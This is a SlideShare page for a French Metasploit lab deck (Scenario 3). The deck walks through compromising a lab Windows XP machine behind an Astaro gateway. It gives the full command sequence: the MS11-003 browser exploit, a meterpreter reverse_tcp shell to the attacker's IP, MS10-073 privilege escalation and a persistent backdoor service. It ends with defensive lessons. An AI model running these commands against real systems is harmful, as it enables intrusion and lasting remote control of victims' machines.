SlideShare une entreprise Scribd logo
1  sur  7
Scénarios Metasploit
                                                     Scénario 3




Http://labs.zataz.com - Http://twitter.com/eromang
Scénario 3 : Topologie

                              Target                                                     Attacker
                         192.168.111.0/24                 Astaro Gateway             192.168.178.0/24



                                                        Firewall Gateway
                                                 Astaro Security Gateway 8.102
                                                   Proxy HTTP/S Transparent
                                                        Anti-virus : Avira
                                            eth0 : 192.168.111.250 (interface interne)
                                            eth1 : 192.168.178.250 (interface externe)

                          Target (cible)                                          Attacker (attaquant)
                        Windows XP SP3                                             IP : 192.168.178.21
           Utilisateur « test » avec privilèges limités                                 Metasploit
 IP : 192.168.111.129 - Passerelle par défaut : 192.168.111.250
             Anti-virus : Dr.Web Security Space
                  Firewall : Windows Firewall
     Vulnérabilités : Vulnérable à MS11-003 & MS10-073
Scénario 3 : Règles Firewall/Proxy




   • Sur Astaro Security Gateway :
      • Le réseau interne ne peut surfer sur Internet qu’en traversant le proxy HTTP/S transparent.
      • Le réseau interne peut surfer sur n’importe quel site Internet, par le groupe «Web Surfing».
      • Le groupe « Web Surfing » contient les autorisations suivantes :
         • HTTP (80/TCP), HTTP Proxy (8080/TCP), HTTP Webcache (3128/TCP), HTTPS (443)
      • Deux anti-virus scan en temps réel le traffic Internet (Avira & ClamAV)

   • Sur la cible :
      • Dr.Web anti-virus est installé, mais pas Dr.Web Firewall car pas proposé par défaut.
      • Le Firewall local Windows est activé et configuré par défaut.
Scénario 3 : Story-Board
Cette topologie réseau correspond à certaines configurations ADSL d’internautes et aussi à la configuration de quelques
petites et moyennes entreprises.

The réseau cible à 5 contre-mesures :
    • Une passerelle Firewall qui ne permet de surfer sur Internet que par le biais du groupe « Web Surf ».
    • Un proxy transparent HTTP/S situé sur la passerelle Firewall.
    • Deux antivirus, situé sur la passerelle Firewall, scannant en temps réel le surf sur Internet (Avira & ClamAV).
    • Un anti-virus Dr.Web Security Space sur l’ordinateur cible, avec une configuration par défaut.
    • Le Firewall local Windows activé sur l’ordinateur cible, avec une configuration par défaut.

Il existe des bugs ouverts (ID16438 - ID16255), pour les certificats «self-signed», sur ASG8, datant du 11-02-2011. Certain
sites web banquaire ne sont plus disponibles et les exceptions dans « Certificat Trust Check » ne fonctionne plus avec le
proxy en mode transparent. Comme contre-mesure Astaro recommande de désactiver le scan anti-viral HTTPS (SLL) !
http://www.astaro.com/lists/Known_Issues-ASG-V8.txt

Nous allons utiliser ces bugs connus en tant que vecteur d’attaque, car tous les ASG 8.100 et supérieur sont affectés. La
version 8.100 est disponible depuis le 20-01-2011. La version 8.103 corrigera les bugs.

La cible est vulnérable à la vulnérabilité Internet Explorer MS11-003 et à la vulnérabilité MS10-073 Keyboard Layout.
     • MS11-003 sera notre point d’entrée.
     • MS10-073 sera notre vecteur d’escalade de privilèges (Stuxnet).
Scénario 3 : Story-Board
L’attaquant envoi un message Twitter à la cible. Le message contient un lien malveillant dirigeant vers un site web
permettant d’exploiter la vulnérabilité MS11-003.

Un message d’alerte Internet Explorer sera affiché à propos du certificat HTTPS, sur la démonstration nous n’avons pas
de CA valide.
La victime clique sur le lien fournis et la vulnérabilité MS11-003 est exploitée. Après exploitation un «payload»
meterpreter reverse_tcp est initié vers l’attaque sur le port 8080/TCP.

L’attaquant doit vérifier si les patchs suivant sont installés, afin de pouvoir lancer l’attaque du type « escalade de
privilèges» MS10-073 :

• MS11-012 (KB2479628) / MS10-098 (KB2436673) / MS10-073 (KB981957)

Si un de ces patchs est installé, l’escalade de privilèges par le biais de MS10-073 sera impossible. winenum est la
solution pour récupérer la liste des patchs installés.

L’attaquant va exécuter l’escalade de privilèges MS10-073.

L’attaquant va installer une «backdoor» meterpreter reverse_tcp persistente en tant que service sur la cible.
Scénario 3 : Commandes
use exploit/windows/browser/ms11_003_ie_css_import
set SRVHOST 192.168.178.21
set SRVPORT 443
set SSL true
set URIPATH /readme.html
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set LPORT 8080
exploit

migrate X -> vers un autre processus
kill X -> 2 fois -> notepad.exe & et le processus iexplorer.exe
getuid
getprivs
getsystem
sysinfo
ipconfig
route
background


use post/windows/escalate/ms10_073_kbdlayout
set SESSION 1
run
sessions -i 1
getuid
migrate X -> vers un processus «NT AUTHORITYSYSTEM»
run persistence -U -i 5 -p 8080 -r 192.168.178.21
Scénario 3 : Leçons apprises


• Mettre à jour son OS et ses applicatifs !
• Ne jamais cliquer sur des liens, surtout raccourcis, provenant de sources inconnues !

• Toujours analyser le traffic sortant HTTPS avec un anti-virus.
• Ne pas faire confiance à son anti-virus !
• Sélectionner un anti-virus qui est capable de détecter des attaques basiques !
• Ne pas faire confiance à ses Firewalls (Locaux ou distants) !

• Suivre les bugs connus et les « Release Notes » de vos applicatifs.




                                                                                          7

Contenu connexe

Tendances

Ebook fr 2020 hackers - 214 pages pour apprendre le hacking en francais - c...
Ebook fr   2020 hackers - 214 pages pour apprendre le hacking en francais - c...Ebook fr   2020 hackers - 214 pages pour apprendre le hacking en francais - c...
Ebook fr 2020 hackers - 214 pages pour apprendre le hacking en francais - c...usthbsido
 
Sécuriser un serveur web
Sécuriser un serveur webSécuriser un serveur web
Sécuriser un serveur webTaoufik JABBARI
 
les logiciels malveillant
les logiciels malveillantles logiciels malveillant
les logiciels malveillantfehmi arbi
 
Les attaques reseaux par zellagui Amine
Les attaques reseaux par zellagui AmineLes attaques reseaux par zellagui Amine
Les attaques reseaux par zellagui AmineZellagui Amine
 
Extraction mots de passe par attaque Man-in-the-middle
Extraction mots de passe par attaque Man-in-the-middleExtraction mots de passe par attaque Man-in-the-middle
Extraction mots de passe par attaque Man-in-the-middleBruno Valentin
 

Tendances (8)

Ebook fr 2020 hackers - 214 pages pour apprendre le hacking en francais - c...
Ebook fr   2020 hackers - 214 pages pour apprendre le hacking en francais - c...Ebook fr   2020 hackers - 214 pages pour apprendre le hacking en francais - c...
Ebook fr 2020 hackers - 214 pages pour apprendre le hacking en francais - c...
 
Sécuriser un serveur web
Sécuriser un serveur webSécuriser un serveur web
Sécuriser un serveur web
 
pres2
pres2pres2
pres2
 
les logiciels malveillant
les logiciels malveillantles logiciels malveillant
les logiciels malveillant
 
Les attaques reseaux par zellagui Amine
Les attaques reseaux par zellagui AmineLes attaques reseaux par zellagui Amine
Les attaques reseaux par zellagui Amine
 
Extraction mots de passe par attaque Man-in-the-middle
Extraction mots de passe par attaque Man-in-the-middleExtraction mots de passe par attaque Man-in-the-middle
Extraction mots de passe par attaque Man-in-the-middle
 
Les menaces apt
Les menaces aptLes menaces apt
Les menaces apt
 
Weos backup_clé_usb
Weos backup_clé_usbWeos backup_clé_usb
Weos backup_clé_usb
 

En vedette

Le piratage à la portée de tout le monde
Le piratage à la portée de tout le mondeLe piratage à la portée de tout le monde
Le piratage à la portée de tout le mondemichelcusin
 
Backdoors et rootkits_avancees_[slides]
Backdoors et rootkits_avancees_[slides]Backdoors et rootkits_avancees_[slides]
Backdoors et rootkits_avancees_[slides]UltraUploader
 
Owning bad guys {and mafia} with javascript botnets
Owning bad guys {and mafia} with javascript botnetsOwning bad guys {and mafia} with javascript botnets
Owning bad guys {and mafia} with javascript botnetsChema Alonso
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
 
Partie II – ASM Application Security Manager
Partie II – ASM Application Security ManagerPartie II – ASM Application Security Manager
Partie II – ASM Application Security Managere-Xpert Solutions SA
 
Static analysis for security
Static analysis for securityStatic analysis for security
Static analysis for securityFadi Abdulwahab
 
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shahNull 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shahnullowaspmumbai
 
Air Navigation Service Providers - Unsecurity on Voice over IP Radion
Air Navigation Service Providers - Unsecurity on Voice over IP RadionAir Navigation Service Providers - Unsecurity on Voice over IP Radion
Air Navigation Service Providers - Unsecurity on Voice over IP RadionSylvain Maret
 
Installation configuration openvas
Installation configuration openvasInstallation configuration openvas
Installation configuration openvasSafae Rahel
 
Spring Par La Pratique
Spring Par La PratiqueSpring Par La Pratique
Spring Par La Pratiquesalmenloukil
 
Introduction to burp suite
Introduction to burp suiteIntroduction to burp suite
Introduction to burp suiteUtkarsh Bhargava
 
Ca hakin9-06-2008-googlehacking
Ca hakin9-06-2008-googlehackingCa hakin9-06-2008-googlehacking
Ca hakin9-06-2008-googlehacking81787
 
Pattern detection in a remote LAN environment (EN)
Pattern detection in a remote LAN environment (EN)Pattern detection in a remote LAN environment (EN)
Pattern detection in a remote LAN environment (EN)Bruno Valentin
 
Rapport de base de données gaci cui
Rapport de base de données gaci cuiRapport de base de données gaci cui
Rapport de base de données gaci cuiIdir Gaci
 
Webinar: Ransomware - Five Reasons You’re Not As Protected As You Think
Webinar: Ransomware - Five Reasons You’re Not As Protected As You ThinkWebinar: Ransomware - Five Reasons You’re Not As Protected As You Think
Webinar: Ransomware - Five Reasons You’re Not As Protected As You ThinkStorage Switzerland
 
Using Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style AttacksUsing Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style AttacksIBM Security
 

En vedette (20)

Le piratage à la portée de tout le monde
Le piratage à la portée de tout le mondeLe piratage à la portée de tout le monde
Le piratage à la portée de tout le monde
 
Backdoors et rootkits_avancees_[slides]
Backdoors et rootkits_avancees_[slides]Backdoors et rootkits_avancees_[slides]
Backdoors et rootkits_avancees_[slides]
 
Owning bad guys {and mafia} with javascript botnets
Owning bad guys {and mafia} with javascript botnetsOwning bad guys {and mafia} with javascript botnets
Owning bad guys {and mafia} with javascript botnets
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
 
Cours Secu Web
Cours Secu WebCours Secu Web
Cours Secu Web
 
Partie II – ASM Application Security Manager
Partie II – ASM Application Security ManagerPartie II – ASM Application Security Manager
Partie II – ASM Application Security Manager
 
Static analysis for security
Static analysis for securityStatic analysis for security
Static analysis for security
 
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shahNull 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
 
ASFWS 2013 - Welcome
ASFWS 2013 - Welcome ASFWS 2013 - Welcome
ASFWS 2013 - Welcome
 
Air Navigation Service Providers - Unsecurity on Voice over IP Radion
Air Navigation Service Providers - Unsecurity on Voice over IP RadionAir Navigation Service Providers - Unsecurity on Voice over IP Radion
Air Navigation Service Providers - Unsecurity on Voice over IP Radion
 
Installation configuration openvas
Installation configuration openvasInstallation configuration openvas
Installation configuration openvas
 
Spring Par La Pratique
Spring Par La PratiqueSpring Par La Pratique
Spring Par La Pratique
 
Introduction to burp suite
Introduction to burp suiteIntroduction to burp suite
Introduction to burp suite
 
Ca hakin9-06-2008-googlehacking
Ca hakin9-06-2008-googlehackingCa hakin9-06-2008-googlehacking
Ca hakin9-06-2008-googlehacking
 
Pattern detection in a remote LAN environment (EN)
Pattern detection in a remote LAN environment (EN)Pattern detection in a remote LAN environment (EN)
Pattern detection in a remote LAN environment (EN)
 
Rapport de base de données gaci cui
Rapport de base de données gaci cuiRapport de base de données gaci cui
Rapport de base de données gaci cui
 
OWASP Zed Attack Proxy
OWASP Zed Attack ProxyOWASP Zed Attack Proxy
OWASP Zed Attack Proxy
 
Webinar: Ransomware - Five Reasons You’re Not As Protected As You Think
Webinar: Ransomware - Five Reasons You’re Not As Protected As You ThinkWebinar: Ransomware - Five Reasons You’re Not As Protected As You Think
Webinar: Ransomware - Five Reasons You’re Not As Protected As You Think
 
Bridging the Gap
Bridging the GapBridging the Gap
Bridging the Gap
 
Using Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style AttacksUsing Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style Attacks
 

Similaire à Scénarios d'exploitation Metasploit - FR : Scénario 3

Introduction à La Sécurité Informatique 2/2
Introduction à La Sécurité Informatique 2/2Introduction à La Sécurité Informatique 2/2
Introduction à La Sécurité Informatique 2/2Sylvain Maret
 
Colloque cyber 2010 les botnets
Colloque cyber 2010   les botnetsColloque cyber 2010   les botnets
Colloque cyber 2010 les botnetsmichelcusin
 
Fortinet mathieu nantel
Fortinet mathieu nantelFortinet mathieu nantel
Fortinet mathieu nantelColloqueRISQ
 
Sécurités & Annuaires
Sécurités & AnnuairesSécurités & Annuaires
Sécurités & AnnuairesPaulin CHOUDJA
 
Réseaux-et-Sécurité.pdf
Réseaux-et-Sécurité.pdfRéseaux-et-Sécurité.pdf
Réseaux-et-Sécurité.pdfMoufidaHajjaj
 
Barcamp presentation Cybersecurite by saphia
Barcamp presentation Cybersecurite by saphiaBarcamp presentation Cybersecurite by saphia
Barcamp presentation Cybersecurite by saphiaBarcampCameroon
 
Comment analyser une machine linux compromise
Comment analyser une machine linux compromiseComment analyser une machine linux compromise
Comment analyser une machine linux compromiseTarek MOHAMED
 
ASFWS 2011 - L’importance du protocole HTTP dans la menace APT
ASFWS 2011 - L’importance du protocole HTTP dans la menace APTASFWS 2011 - L’importance du protocole HTTP dans la menace APT
ASFWS 2011 - L’importance du protocole HTTP dans la menace APTCyber Security Alliance
 
20090929 04 - Securité applicative, hacking et risque applicatif
20090929 04 - Securité applicative, hacking et risque applicatif20090929 04 - Securité applicative, hacking et risque applicatif
20090929 04 - Securité applicative, hacking et risque applicatifLeClubQualiteLogicielle
 
CSA_Presentation_Commerciale.ppt
CSA_Presentation_Commerciale.pptCSA_Presentation_Commerciale.ppt
CSA_Presentation_Commerciale.pptMarrelNguemaMvome
 
ASFWS 2013 - Optimiser ses attaques Web avec Burp par Nicolas Grégoire
ASFWS 2013 - Optimiser ses attaques Web avec Burp par Nicolas GrégoireASFWS 2013 - Optimiser ses attaques Web avec Burp par Nicolas Grégoire
ASFWS 2013 - Optimiser ses attaques Web avec Burp par Nicolas GrégoireCyber Security Alliance
 
Les Firewalls / Sécurité informatique
Les Firewalls / Sécurité informatiqueLes Firewalls / Sécurité informatique
Les Firewalls / Sécurité informatiqueSylvain Maret
 
Webinaire : sécurité informatique sur le web - Jérôme Thémée
Webinaire : sécurité informatique sur le web - Jérôme ThéméeWebinaire : sécurité informatique sur le web - Jérôme Thémée
Webinaire : sécurité informatique sur le web - Jérôme ThéméeMarie Tapia
 
Trunk VoiP Asterisk strongsawn openvpn
Trunk VoiP Asterisk strongsawn openvpnTrunk VoiP Asterisk strongsawn openvpn
Trunk VoiP Asterisk strongsawn openvpnYaya N'Tyeni Sanogo
 

Similaire à Scénarios d'exploitation Metasploit - FR : Scénario 3 (20)

Introduction à La Sécurité Informatique 2/2
Introduction à La Sécurité Informatique 2/2Introduction à La Sécurité Informatique 2/2
Introduction à La Sécurité Informatique 2/2
 
Colloque cyber 2010 les botnets
Colloque cyber 2010   les botnetsColloque cyber 2010   les botnets
Colloque cyber 2010 les botnets
 
Fortinet mathieu nantel
Fortinet mathieu nantelFortinet mathieu nantel
Fortinet mathieu nantel
 
Sécurités & Annuaires
Sécurités & AnnuairesSécurités & Annuaires
Sécurités & Annuaires
 
Cours intro
Cours introCours intro
Cours intro
 
Réseaux-et-Sécurité.pdf
Réseaux-et-Sécurité.pdfRéseaux-et-Sécurité.pdf
Réseaux-et-Sécurité.pdf
 
Barcamp presentation Cybersecurite by saphia
Barcamp presentation Cybersecurite by saphiaBarcamp presentation Cybersecurite by saphia
Barcamp presentation Cybersecurite by saphia
 
Comment analyser une machine linux compromise
Comment analyser une machine linux compromiseComment analyser une machine linux compromise
Comment analyser une machine linux compromise
 
Hamster
HamsterHamster
Hamster
 
ASFWS 2011 - L’importance du protocole HTTP dans la menace APT
ASFWS 2011 - L’importance du protocole HTTP dans la menace APTASFWS 2011 - L’importance du protocole HTTP dans la menace APT
ASFWS 2011 - L’importance du protocole HTTP dans la menace APT
 
Forensics: Banking Troubles
Forensics: Banking TroublesForensics: Banking Troubles
Forensics: Banking Troubles
 
20090929 04 - Securité applicative, hacking et risque applicatif
20090929 04 - Securité applicative, hacking et risque applicatif20090929 04 - Securité applicative, hacking et risque applicatif
20090929 04 - Securité applicative, hacking et risque applicatif
 
Protection contre l'ARP poisoning et MITM
Protection contre l'ARP poisoning et MITMProtection contre l'ARP poisoning et MITM
Protection contre l'ARP poisoning et MITM
 
CSA_Presentation_Commerciale.ppt
CSA_Presentation_Commerciale.pptCSA_Presentation_Commerciale.ppt
CSA_Presentation_Commerciale.ppt
 
ASFWS 2013 - Optimiser ses attaques Web avec Burp par Nicolas Grégoire
ASFWS 2013 - Optimiser ses attaques Web avec Burp par Nicolas GrégoireASFWS 2013 - Optimiser ses attaques Web avec Burp par Nicolas Grégoire
ASFWS 2013 - Optimiser ses attaques Web avec Burp par Nicolas Grégoire
 
Les Firewalls
Les FirewallsLes Firewalls
Les Firewalls
 
Les Firewalls / Sécurité informatique
Les Firewalls / Sécurité informatiqueLes Firewalls / Sécurité informatique
Les Firewalls / Sécurité informatique
 
Webinaire : sécurité informatique sur le web - Jérôme Thémée
Webinaire : sécurité informatique sur le web - Jérôme ThéméeWebinaire : sécurité informatique sur le web - Jérôme Thémée
Webinaire : sécurité informatique sur le web - Jérôme Thémée
 
SSL.pdf
SSL.pdfSSL.pdf
SSL.pdf
 
Trunk VoiP Asterisk strongsawn openvpn
Trunk VoiP Asterisk strongsawn openvpnTrunk VoiP Asterisk strongsawn openvpn
Trunk VoiP Asterisk strongsawn openvpn
 

Scénarios d'exploitation Metasploit - FR : Scénario 3

  • 1. Scénarios Metasploit Scénario 3 Http://labs.zataz.com - Http://twitter.com/eromang
  • 2. Scénario 3 : Topologie Target Attacker 192.168.111.0/24 Astaro Gateway 192.168.178.0/24 Firewall Gateway Astaro Security Gateway 8.102 Proxy HTTP/S Transparent Anti-virus : Avira eth0 : 192.168.111.250 (interface interne) eth1 : 192.168.178.250 (interface externe) Target (cible) Attacker (attaquant) Windows XP SP3 IP : 192.168.178.21 Utilisateur « test » avec privilèges limités Metasploit IP : 192.168.111.129 - Passerelle par défaut : 192.168.111.250 Anti-virus : Dr.Web Security Space Firewall : Windows Firewall Vulnérabilités : Vulnérable à MS11-003 & MS10-073
  • 3. Scénario 3 : Règles Firewall/Proxy • Sur Astaro Security Gateway : • Le réseau interne ne peut surfer sur Internet qu’en traversant le proxy HTTP/S transparent. • Le réseau interne peut surfer sur n’importe quel site Internet, par le groupe «Web Surfing». • Le groupe « Web Surfing » contient les autorisations suivantes : • HTTP (80/TCP), HTTP Proxy (8080/TCP), HTTP Webcache (3128/TCP), HTTPS (443) • Deux anti-virus scan en temps réel le traffic Internet (Avira & ClamAV) • Sur la cible : • Dr.Web anti-virus est installé, mais pas Dr.Web Firewall car pas proposé par défaut. • Le Firewall local Windows est activé et configuré par défaut.
  • 4. Scénario 3 : Story-Board Cette topologie réseau correspond à certaines configurations ADSL d’internautes et aussi à la configuration de quelques petites et moyennes entreprises. The réseau cible à 5 contre-mesures : • Une passerelle Firewall qui ne permet de surfer sur Internet que par le biais du groupe « Web Surf ». • Un proxy transparent HTTP/S situé sur la passerelle Firewall. • Deux antivirus, situé sur la passerelle Firewall, scannant en temps réel le surf sur Internet (Avira & ClamAV). • Un anti-virus Dr.Web Security Space sur l’ordinateur cible, avec une configuration par défaut. • Le Firewall local Windows activé sur l’ordinateur cible, avec une configuration par défaut. Il existe des bugs ouverts (ID16438 - ID16255), pour les certificats «self-signed», sur ASG8, datant du 11-02-2011. Certain sites web banquaire ne sont plus disponibles et les exceptions dans « Certificat Trust Check » ne fonctionne plus avec le proxy en mode transparent. Comme contre-mesure Astaro recommande de désactiver le scan anti-viral HTTPS (SLL) ! http://www.astaro.com/lists/Known_Issues-ASG-V8.txt Nous allons utiliser ces bugs connus en tant que vecteur d’attaque, car tous les ASG 8.100 et supérieur sont affectés. La version 8.100 est disponible depuis le 20-01-2011. La version 8.103 corrigera les bugs. La cible est vulnérable à la vulnérabilité Internet Explorer MS11-003 et à la vulnérabilité MS10-073 Keyboard Layout. • MS11-003 sera notre point d’entrée. • MS10-073 sera notre vecteur d’escalade de privilèges (Stuxnet).
  • 5. Scénario 3 : Story-Board L’attaquant envoi un message Twitter à la cible. Le message contient un lien malveillant dirigeant vers un site web permettant d’exploiter la vulnérabilité MS11-003. Un message d’alerte Internet Explorer sera affiché à propos du certificat HTTPS, sur la démonstration nous n’avons pas de CA valide. La victime clique sur le lien fournis et la vulnérabilité MS11-003 est exploitée. Après exploitation un «payload» meterpreter reverse_tcp est initié vers l’attaque sur le port 8080/TCP. L’attaquant doit vérifier si les patchs suivant sont installés, afin de pouvoir lancer l’attaque du type « escalade de privilèges» MS10-073 : • MS11-012 (KB2479628) / MS10-098 (KB2436673) / MS10-073 (KB981957) Si un de ces patchs est installé, l’escalade de privilèges par le biais de MS10-073 sera impossible. winenum est la solution pour récupérer la liste des patchs installés. L’attaquant va exécuter l’escalade de privilèges MS10-073. L’attaquant va installer une «backdoor» meterpreter reverse_tcp persistente en tant que service sur la cible.
  • 6. Scénario 3 : Commandes use exploit/windows/browser/ms11_003_ie_css_import set SRVHOST 192.168.178.21 set SRVPORT 443 set SSL true set URIPATH /readme.html set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 set LPORT 8080 exploit migrate X -> vers un autre processus kill X -> 2 fois -> notepad.exe & et le processus iexplorer.exe getuid getprivs getsystem sysinfo ipconfig route background use post/windows/escalate/ms10_073_kbdlayout set SESSION 1 run sessions -i 1 getuid migrate X -> vers un processus «NT AUTHORITYSYSTEM» run persistence -U -i 5 -p 8080 -r 192.168.178.21
  • 7. Scénario 3 : Leçons apprises • Mettre à jour son OS et ses applicatifs ! • Ne jamais cliquer sur des liens, surtout raccourcis, provenant de sources inconnues ! • Toujours analyser le traffic sortant HTTPS avec un anti-virus. • Ne pas faire confiance à son anti-virus ! • Sélectionner un anti-virus qui est capable de détecter des attaques basiques ! • Ne pas faire confiance à ses Firewalls (Locaux ou distants) ! • Suivre les bugs connus et les « Release Notes » de vos applicatifs. 7

Notes de l'éditeur

  1. \n
  2. \n
  3. \n
  4. \n
  5. \n
  6. \n
  7. \n